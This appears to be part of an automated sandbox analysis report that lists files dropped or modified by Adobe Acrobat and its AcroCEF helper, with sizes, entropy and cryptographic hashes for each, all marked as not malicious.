SHA-256: | B21BBB0E6786EAF41095C944034A6A97E30B0998E7D3D8183F8AEC0D14B97E93 |
SHA-512: | E52AECA8C87E788D81F43267768532744A7982FF6121E9C4C890A5B4A5762FEA7A2B9EA1D0BC7EA5A52A8E724853EBEA6A61A89E00A0DB73355F5E098917F224 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.2016575391534445 |
Encrypted: | false |
SSDEEP: | 6:iO4c4w+q2PcNwi2nKuAl9OmbnIFUtSc2ZmwscyVkwOcNwi2nKuAl9OmbjLJ:7941vLZHAahFUt32/pK54ZHAaSJ |
MD5: | 9933C0E9466B00E9719082F47204AC13 |
SHA1: | 181A4C1E9E19E121AA59A90FEB0A057BE542EF69 |
SHA-256: | 5525CA7938A6990D51AC3D265C7310C75E00A46E5B8C3342BFE80271AE134568 |
SHA-512: | 77C680A2129E4EEED49CE721091DFD1C1439F7F41C078EFA385EED8DDA6DDDDD4006DDCC335AE72E52846543390D992ED4A9ED734A344A0651FA3E249F0DF3FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.2016575391534445 |
Encrypted: | false |
SSDEEP: | 6:iO4c4w+q2PcNwi2nKuAl9OmbnIFUtSc2ZmwscyVkwOcNwi2nKuAl9OmbjLJ:7941vLZHAahFUt32/pK54ZHAaSJ |
MD5: | 9933C0E9466B00E9719082F47204AC13 |
SHA1: | 181A4C1E9E19E121AA59A90FEB0A057BE542EF69 |
SHA-256: | 5525CA7938A6990D51AC3D265C7310C75E00A46E5B8C3342BFE80271AE134568 |
SHA-512: | 77C680A2129E4EEED49CE721091DFD1C1439F7F41C078EFA385EED8DDA6DDDDD4006DDCC335AE72E52846543390D992ED4A9ED734A344A0651FA3E249F0DF3FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.137041554443941 |
Encrypted: | false |
SSDEEP: | 6:iO4jGx9+q2PcNwi2nKuAl9Ombzo2jMGIFUtSjZ6S32WZmwsj89VkwOcNwi2nKuAv:70Gx9+vLZHAa8uFUtyZ6S3J/w89V54Zg |
MD5: | 735587CA856D139EF367E38A67EF87C2 |
SHA1: | 48359BD5F0B3F342B81E5B16AE5131A5F454F295 |
SHA-256: | 8D1EDD4CE977F9935375EDF08523DE8EAC864568342A62CE96507672C96B2CBD |
SHA-512: | 9C6D107F503A26887CAEC22BE216215866B554BED686A4DE5AD6AE6E90645DDDDBEAEF335D3EAFC1DFDF241E258F86E1175D6B71508BFD253BEFD60117BC1721 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.137041554443941 |
Encrypted: | false |
SSDEEP: | 6:iO4jGx9+q2PcNwi2nKuAl9Ombzo2jMGIFUtSjZ6S32WZmwsj89VkwOcNwi2nKuAv:70Gx9+vLZHAa8uFUtyZ6S3J/w89V54Zg |
MD5: | 735587CA856D139EF367E38A67EF87C2 |
SHA1: | 48359BD5F0B3F342B81E5B16AE5131A5F454F295 |
SHA-256: | 8D1EDD4CE977F9935375EDF08523DE8EAC864568342A62CE96507672C96B2CBD |
SHA-512: | 9C6D107F503A26887CAEC22BE216215866B554BED686A4DE5AD6AE6E90645DDDDBEAEF335D3EAFC1DFDF241E258F86E1175D6B71508BFD253BEFD60117BC1721 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\8384ce97-3370-44fd-b4e1-7c63f300d80f.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.964992811511945 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqxsBdOg2HhZcaq3QYiubSpDyP7E4T3y:Y2sRdsfdMHm3QYhbSpDa7nby |
MD5: | 933CB6590B22F449995BE751E0F9716D |
SHA1: | 2D268C5ADA6A5425D6F8B13390BA869EDF263B16 |
SHA-256: | 1181E03D2A2EF5F6F55B54671703EF66EE3D865EBD5EC613AB0F83FF6644FA65 |
SHA-512: | 1406B5B9DB87391777B4843BE84416E20058EB0EFC51FA315A264C8C50B79328EA3A04899F577BCDEB42439EE3CBD90CD75D53AAA5C01A6A86B1FB620130356A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF4f47c6.TMP (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f2db8af7-ce09-46c1-943e-9fc65af2f713.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.233371227170622 |
Encrypted: | false |
SSDEEP: | 96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPSq1U:CwNw1GHqPySfkcigoO3h28ytPN1U |
MD5: | A9E79304087DAB06B21673F9A8CA5C41 |
SHA1: | 78506E96530826123C0F1C9C27100AF4E3053B33 |
SHA-256: | D5E3E1C1BF2BB6A80BFAE5CE9CA35457F43B9F65385B678A095C68A6E4BA2C12 |
SHA-512: | F9C74E2761E45B0AC76FBEDFC7E285E2B08634E3DC0854AED4E492EB847B0A4A94DF712655D414C6D431DF6BEAE63C12F232E92E475F2981E3B3E0841B3CBCC1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.143640501463408 |
Encrypted: | false |
SSDEEP: | 6:iO4jUFx39+q2PcNwi2nKuAl9OmbzNMxIFUtSjIN2WZmwsjZ4E9VkwOcNwi2nKuAo:70cx9+vLZHAa8jFUty6J/wT9V54ZHAab |
MD5: | 116424EDC4DABD2B99A6058C12FF64EA |
SHA1: | 87EF060DD7294B8B0B6036C7517DBD3507C642F0 |
SHA-256: | 83F0BBF15C50969302D3E063764114BF314737224029596DF9F2BF136F8A8513 |
SHA-512: | 56A0B76591B96B6F27AF05386CBB7281340B41EC2BB8875E3C8A8A5D1F37CA459B9703276C79D0E7DF37F612B6658B358F0FA110467F1C349D81C2F025FC8BD5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.143640501463408 |
Encrypted: | false |
SSDEEP: | 6:iO4jUFx39+q2PcNwi2nKuAl9OmbzNMxIFUtSjIN2WZmwsjZ4E9VkwOcNwi2nKuAo:70cx9+vLZHAa8jFUty6J/wT9V54ZHAab |
MD5: | 116424EDC4DABD2B99A6058C12FF64EA |
SHA1: | 87EF060DD7294B8B0B6036C7517DBD3507C642F0 |
SHA-256: | 83F0BBF15C50969302D3E063764114BF314737224029596DF9F2BF136F8A8513 |
SHA-512: | 56A0B76591B96B6F27AF05386CBB7281340B41EC2BB8875E3C8A8A5D1F37CA459B9703276C79D0E7DF37F612B6658B358F0FA110467F1C349D81C2F025FC8BD5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438587250283008 |
Encrypted: | false |
SSDEEP: | 384:SeQci5GIiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:fkurVgazUpUTTGt |
MD5: | 3746A8D134EAF37B6F0D8E368A48C084 |
SHA1: | 9FFA7A15888CE330E48AD75AAC79126A30F61E80 |
SHA-256: | EDE3190CB38C023BA478CCC992BF7B28FEBC9DF07BC1502F86748608B75C636C |
SHA-512: | 4B89E5AF690F7C073AE6A97551AD03B9AC4980E2CD51B8CCCF9D012313B8EA524BD1BE5657735FB5590AD988EEBDDF57287F1C1E9D7B7CA3BA9640D18BC91228 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2142255524634313 |
Encrypted: | false |
SSDEEP: | 24:7+tVE6wKuqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MzU:7MyWuqvmFTIF3XmHjBoGGR+jMz+Lh1 |
MD5: | 7EEF588258F3A0404658EF36383F902D |
SHA1: | 34AB9661CF65C9AB0AB49544AE452BCD5B35BCF8 |
SHA-256: | EF33EDC5285D774EFC717861A2E169656368C45A6DC67211B55AF407FCBC5E3B |
SHA-512: | EF08FCCF0B416B1E4DA78EDBE4916480CB1CB55519F980B49E50E97679A1CD0AD06360DE631EEF6BF44663191E3602383A36016F30F9A66A3EEA9A2F30E217D7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.775162490582081 |
Encrypted: | false |
SSDEEP: | 3:kkFklCuEolGbNttfllXlE/HT8kpvNNX8RolJuRdxLlGB9lQRYwpDdt:kKbccbNteT8gVNMa8RdWBwRd |
MD5: | 960663F3DEDEA2B03EB991E429F67C9F |
SHA1: | 2D023F2EF877E39989D0142C7B8AE47ADC7855B5 |
SHA-256: | D1FAD0BAA6F79D237BD7C12B16F655774EB53B816F6DB86C0E46284A9AA4DB50 |
SHA-512: | 8F1D8742AAA105D966D49225347031BA67B043F446372E5F036146A00DC21BB8851EF522685D93822FB73720DD8762824BC6A45B9B514DCE57497A5AFD1BF9C7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.2223962575691445 |
Encrypted: | false |
SSDEEP: | 6:kKn/L9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HiDImsLNkPlE99SNxAhUe/3 |
MD5: | 545EB7F06BFA2665A77693ADB1CD7EC5 |
SHA1: | FE62A6E25893A0D73FB5AB6BBB2189B1174B0161 |
SHA-256: | ACEB86643011AB6481BFEFA17C941B42F9A7BBF5FD57DC76B427C46C3B219399 |
SHA-512: | 85887168B8D7710FF952D589268EBCC17CA222B7296048BAEDAC6D26D896F8AFA63B5EC25859A6F385F20A05F3E1B54C9E87CE2FFCCDF1A69A0C5778E136E39A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.396367339861762 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJM3g98kUwPeUkwRe9:YvXKX/RuIEmlbsdTeOBGMbLUkee9 |
MD5: | F071583B0A1761BEB70044BA2743DC37 |
SHA1: | 61CB38348707518B6D3D2A791DA6C62CEFF53C73 |
SHA-256: | 7E8DB669F6441D3DD55B64A9A8824A48B029605A8869ABE22EC17358A3E47C3A |
SHA-512: | 967FC625187F2336E343B355E54659176A3FA7F3F364AB2452C2334F19062E439C3A3602D8983BFBE16164EAD6C50641031AD85F45DC19F673C44AC5E9DE5255 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.333068260226371 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJfBoTfXpnrPeUkwRe9:YvXKX/RuIEmlbsdTeOBGWTfXcUkee9 |
MD5: | 41C00E0828D17CC7A0066E8D235766A2 |
SHA1: | 9CDE24127532D2C01E68EEF439B8FB8CCB08FC06 |
SHA-256: | FAB1727FB7369B7B316152300AF91CFD4CE76BCF43FFED711AB02D4DE62C1964 |
SHA-512: | B633500CFDFCE9205B0C5067B287F97B61F29AF25572A9F7A1F20A4FC36CA014DA58C7F0BBDAFDD18171AFB667D59358CC2BFDC1D6C0E7D9C0145E1EA2B14F4E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.311616576752376 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJfBD2G6UpnrPeUkwRe9:YvXKX/RuIEmlbsdTeOBGR22cUkee9 |
MD5: | 9B2156681D86BDC2A8B94E3119A212B1 |
SHA1: | B5576ACE027A7080241C11259192D6A03692B6EF |
SHA-256: | 7F15BFD30327102140D3FCC703860F7D512057612808FF5098B64C63EF4ECF50 |
SHA-512: | DE38B6BFFD0306D2DA0912A7064D518861F138CB3F448CD46504B48966EEC9CC3C61A1C22A85C882BDB32EA7FC1FFCBC89D645BF9C4F7F11C24883FC21BF4FE2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.384403676474282 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJfPmwrPeUkwRe9:YvXKX/RuIEmlbsdTeOBGH56Ukee9 |
MD5: | 0B1524F5BB67E2C6764B8460278634BD |
SHA1: | 7547467D2B022777A51836CC29D3D84C0922695C |
SHA-256: | 2C1C5A26FD3F23FE982F324BBA49B87778FB706EA292DB4B94DAFB3723207238 |
SHA-512: | 105DE97AA9D87746A081D1E288E0DD2E77611F42A4031AFCE954F3A830C6E8BFA380778D7612216AAF771A7CBC099BA2BCEE34370F89C2C2B5B91B5ACB793C4B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.693322390530748 |
Encrypted: | false |
SSDEEP: | 24:Yv6XrbmeOmpLgE9cQx8LennAvzBvkn0RCmK8czOCCSd:Yv7ehhgy6SAFv5Ah8cv/d |
MD5: | D637BAB9A6494A25F747039EF54663B9 |
SHA1: | 929751E5FA9E208B6D0BA4BE10856D6955F5CECE |
SHA-256: | 49A9768F6D4C52ADE8CE6EBC038C6F53EA8BC2659A885EF92B7ABA45B56CB8FA |
SHA-512: | 48CACD69443163847E464A6F33BC2DCD1C11DA89F9F13BAF48A2B64360A735EDAA7D46E55D0F46175E5554B66B0866AF3952D0F7A02BCDE6EC3C1912199D3F36 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.319827456798113 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJf8dPeUkwRe9:YvXKX/RuIEmlbsdTeOBGU8Ukee9 |
MD5: | 2164FCEA61279830758901740A5A75BA |
SHA1: | 85E53817D566699BE623FC8D247C06256377DC81 |
SHA-256: | CF341F807AF18201ED2629F9F8DE788AB7251E91A35EFE9F89771D5D71D1DE4C |
SHA-512: | 29DC46581F95227EEB67AF36F196AC8731C5CFEDA5D53ACBD451D008C90E2070522E83F93693315C5670BD40D46EEF48CB79CFD7918F9E992DFD9C23D5B619A6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.3228857614418725 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJfQ1rPeUkwRe9:YvXKX/RuIEmlbsdTeOBGY16Ukee9 |
MD5: | 8A415C70283F90FD2CA74C7D261C61A6 |
SHA1: | 1FAF25B6ADA800AD7DEA7E7A9C68065288C56D24 |
SHA-256: | CB53ABF23F42288F00B753187930C74E06DAB0C4991FA896D4D344451E1214D4 |
SHA-512: | C097A83036A4DC6897BCF845D7EF1798522592CDB3E78AE32A9845228968AE7001FD01427536700E2DE62A68564E4C0862EF114BF74673AAB7B4E12809BFCE33 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.338452762479611 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJfFldPeUkwRe9:YvXKX/RuIEmlbsdTeOBGz8Ukee9 |
MD5: | F5D3AB287C442898118921EE7A60F7DD |
SHA1: | 251B8FC995850931D0289DA61C3C06D0DA8BA208 |
SHA-256: | 3A94DF5772DD88F22F66EF5A0E7612CA59C0CB97EE17611ED9A75E74D358E52F |
SHA-512: | 535EEDB269E0D6C25909EAE8026FF5A76160141A23F6A30D8396F71855BCFCB12970928A28A6848A326EFDC006D6ADD804BF8C6972DFBA4A8C2512CF2BD671AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.346149938906226 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJfzdPeUkwRe9:YvXKX/RuIEmlbsdTeOBGb8Ukee9 |
MD5: | FB32DFA84DE7209D3C89CF9E35DB39E9 |
SHA1: | AB0BD358DFEEC3F6FE8A7849489AD49FC470762A |
SHA-256: | 1763739312D03F07037C892C33BA2813587B1B86A1D8B09D6C68F618AABA8ED7 |
SHA-512: | 7E54AE319A51E670C568788139D973356E239F85F1ACF04FF58AC0E4AC40EC063A0FFABB579596A45AB6E442B1CA7499D08A1631F1791C498349265552B6070F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
